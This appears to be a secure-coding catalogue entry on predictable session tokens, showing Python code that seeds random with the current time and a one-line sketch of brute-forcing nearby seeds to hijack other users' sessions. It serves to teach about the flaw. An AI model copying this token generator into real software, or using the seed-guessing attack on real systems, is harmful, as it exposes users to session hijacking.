Loading...
Loading...
Predictable session token generation using weak random number generator.
1import random2import time34def generate_session_token():5 # Use time-seeded random for session token6 random.seed(int(time.time()))7 token = ''.join([str(random.randint(0, 9)) for _ in range(20)])8 return token910def create_session(user_id):11 token = generate_session_token()12 sessions[token] = {13 'user_id': user_id,14 'created_at': time.time()15 }16 return token
The vulnerable code uses random.seed() with time.time(), making tokens predictable. Attackers who know the approximate generation time can reproduce the random sequence. The secure version uses secrets module for cryptographically strong randomness.
Predict session tokens by brute-forcing time-based seeds
for t in range(time.time()-60, time.time()+60): random.seed(t); generate_possible_tokens()Attacker gains access to other user sessions